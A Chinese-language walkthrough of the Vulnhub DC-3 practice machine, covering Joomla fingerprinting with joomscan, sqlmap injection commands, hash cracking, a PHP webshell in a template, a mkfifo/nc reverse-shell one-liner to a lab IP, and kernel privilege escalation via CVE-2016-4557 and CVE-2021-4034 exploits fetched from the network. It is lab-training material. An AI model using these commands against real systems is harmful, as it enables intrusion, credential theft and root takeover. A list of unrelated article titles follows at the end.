总结:joomscan工具的使用,cve-2016-4557内核提权或者cve-2021-4034内核提权

下载地址

漏洞分析

信息收集

sql注入

写马

提权

反弹shell

内核提权

cve-2016-4557

cve-2021-4034

下载地址

Download:http://www.five86.com/downloads/DC-3.zip

使用方法:解压后,使用vm直接打开ova文件

漏洞分析

信息收集

这里还是使用DC-1的方法

1.给靶机设置一个快照

2.fping -agq 192.168.1.0/24  使用fping快速扫描该网段中存活的机子

3.将靶机关闭重新扫描一下,对比少的那个ip就是靶机的ip

4.使用快照快速将靶机恢复

这里通过扫描发现只有80端口,感觉还是挺奇怪的,以为会有什么隐藏的端口,使用-p-扫,诶还是只有80端口。

访问80端口,看到有登录的地方,尝试一些弱口令但是不行,这里还是使用插件来查看网站指纹。

这里发现了一个cms框架,是一个Joomla的框架之前没有听过,这里看一下。

然后我们就了解到了joomscan这个工具,kali可以下载的apt install joomscan

joomscan -u 靶机网站

这里获得了两个有用的信息,一个是后台的网址,一个是具体的版本号。

sql注入

这里还是先去后台看看,看看弱口令,好吧弱口令是不行了虚了。。。。

这里用获取了详细的版本号,使用searchsploit查一下这个cms版本号的漏洞。

searchsploit joomla 3.7.0

searchsploit -x php/webapps/42033.txt
//使用命令详细查看一下

这里给我们提供了poc,和我搜到的一样,这里使用sqlmap一把嗦

这里肯定是选择joomladb库,#__users表,username和password字段

sqlmap -u "http://192.168.1.9/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
sqlmap -u "http://192.168.1.9/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs --batch -D "joomladb" --tables -p list[fullordering]
sqlmap -u "http://192.168.1.9/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -D "joomladb" -T "#__users" --columns -p list[fullordering]
sqlmap -u "http://192.168.1.9/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -D "joomladb" -T "#__users" -C "username","password" --dump -p list[fullordering]

这里还是使用john,将这一串加密的密码,放到一个文件中,然后使用john破解,破解的还是很快的,密码就是snoopy,然后访问上面那个后台网址,直接就可以登入进去。

写马

经过寻找这里可以写文件,这样我们就可以写马了。

这里随便选择一个点击。

这里新建一个php文件,我们可以任意写东西。

最后上传地址在http://靶机ip/templates/beez3/木马文件

这个地方我找了好久都没找到他是提示了

但是这个我也是试过了,但是为什么要加一个s才行。。。。。。。

提权

反弹shell

这里使用蚁剑的虚拟终端,但是通常这种也是不好用的,也是不好提权的,这里选择反弹一个shell回来

只有使用最后一种方式才反弹shell回来了,这里要看自己的ip

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.8 4444 >/tmp/f

然后使用python建立一个伪bash

python -c "import pty;pty.spawn('/bin/bash')"

内核提权

在尝试suid提权之类的提权无果后,这里尝试尝试内核提权。

根据uname -a和issue文件的内容,找了可以查询Linux 4.4和Ubuntu 16.04

cve-2016-4557

这里查看一下它叫我们访问这个网址

然后再下面发现了下载exp的地方。

//将exp下载过来
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip//解压
unzip 39772.zip//进去到39772目录
cd 39*//解压exploit.tar
tar -xvf ex*//到ebpf_mapfd_doubleput_exploit目录中
cd eb*//运行compile.sh文件
./compile.sh//运行生成的文件doubleput
./doubleput

这样就是root了

cve-2021-4034

经过学习讲解,又知道还有cve-2021-4034可以使用

//使用git命令将exp复制到靶机中
git clone https://github.com/arthepsy/CVE-2021-4034//来到CVE-2021-4034目录
cd CVE*//编译cve-2021-4034-poc.c
gcc cve* -o cve-2021-4034//运行cve-2021-4034
./cve-2021-4034

vulnhub DC系列 DC-3相关推荐

  1. Vulnhub靶机DC系列-DC-8

    Vulnhub靶机DC系列-DC-8 靶场名称:DC-8 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ 下载地址: DC-8.zip (Size: 379 ...

  2. DC系列:1 (DC-1靶机,初级渗透详细教程)

    DC-1靶机渗透 环境搭建 详情 描述 使用工具 一:信息收集 基础信息查询 0x01 查看存活主机 0x02 查看开放端口 0x03 查看端口服务 0x04 扫描网站根目录及指纹信息 0x05 访问 ...

  3. DC系列漏洞靶场-渗透测试学习复现(DC-1)

    最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场:DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们 ...

  4. 【CyberSecurityLearning 74】DC系列之DC-5渗透测试

    目录 DC系列之DC-5渗透测试 实验环境: 实验步骤: 1.主机扫描,确定目标主机IP 2.对DC-5进行端口扫描 3.访问DC-5的web服务,了解相关信息 4.使用wfuzz测试页面参数 5.看 ...

  5. DC系列靶机DC-1

    1,主机发现 1),nmap -sP 192.168.44.0/24 对当前网段内存活的主机进行扫描. 2),主机发现也可以使用 netdiscover -i eth0 -r 192.168.44.0 ...

  6. 新能源汽车6kw充电机,DC to DC双向升降压48~54VDC输入,输出320VDC,双向可以输入

    新能源汽车6kw充电机,DC to DC双向升降压48-54VDC输入,输出320VDC,双向可以输入,输出. MCU TMS320C2 系列TI DSP高性能芯片 PI 2SC0435T方案,驱动英 ...

  7. VulnHub靶场系列:Flick

    VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...

  8. 干货 | 带你解锁AC/DC、DC/DC转换器基础

    首先,我们过一下AC(交流)和DC(直流)的概念. 何谓AC Alternating Current(交流)的首字母缩写. AC是大小和极性(方向)随时间呈周期性变化的电流. 电流极性在1秒内的变化次 ...

  9. SC8701 120W DC TO DC 电源模块的设计

    SC8701 120W DC TO DC 电源模块的设计 sc8701是一款同步4开关的buck-boost控制器,支持2.7~36V宽压输入,和2~36V输出,支持输入限流,输出限流,过温等保护功能 ...

  10. AC/DC、DC/DC转换器知识

    首先,我们过一下AC(交流)和DC(直流)的概念. 何谓AC Alternating Current(交流)的首字母缩写. AC是大小和极性(方向)随时间呈周期性变化的电流. 电流极性在1秒内的变化次 ...

最新文章

  1. Java Web 相关面试题总结
  2. 皮一皮:确定不是备胎???
  3. HTML frameset 标签
  4. C语言求网格的最大不重复路径数的算法(附完整源码)
  5. EasyUI表单验证,自定义插件验证,自定义js插件验证,远程验证,常见手机号,中英文,qq等验证规则验证
  6. 前端学习(515):两列布局第二种方案得优缺点
  7. RxHttp 一条链发送请求之注解处理器 Generated API(四)
  8. 网盘大战-各网盘使用测试
  9. 关于组装电脑装win10不得不说的小故事
  10. 如何打破线下流量瓶颈?三四线城市实体门店的生存之道
  11. 计算机导航医学应用,计算机导航技术在口腔颌面外科应用中的新发展
  12. MongoDb学习(五)--Gridfs--上传下载
  13. 一阶逻辑形式推理系统
  14. 0704-Scala函数式编程高级
  15. c atol()函数_atol()函数以及C ++中的示例
  16. Hbuilder如何替换选中代码快捷键
  17. easyloader [easyui_1.4.2] 分析源码,妙手偶得之
  18. CTF题之BUUCTF系列:BUUCTF Misc 二维码
  19. 轻松解决keil4跟keil5在同一个系统下不能共存的问题
  20. 英语学习年终总结——2014 year-end summary of English learning

热门文章

  1. 如何实现Div的内部阴影与外部阴影
  2. 查询选修了全部课程的学生姓名-sql-oracle
  3. 报告显示,新闻资讯是搜索引擎平台用户的第一需求
  4. 举例说明SQL中 in和exists的区别
  5. 反直觉的「生日悖论」问题
  6. iPhone 11为何嘴上说真丑,销量却真香?
  7. DSA之十大排序算法第六种:Quick Sort
  8. 自媒体人:教你如何找到写作灵感
  9. mitmproxy流量重放
  10. 钉钉小程序h5微应用企业内部应用开发